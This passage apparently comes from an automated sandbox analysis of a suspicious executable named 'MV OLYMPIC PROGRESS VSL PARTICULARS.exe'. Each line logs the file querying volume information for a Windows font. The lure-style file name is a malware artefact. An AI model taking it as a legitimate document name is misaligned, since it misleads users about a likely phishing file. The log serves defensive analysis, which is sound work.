          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
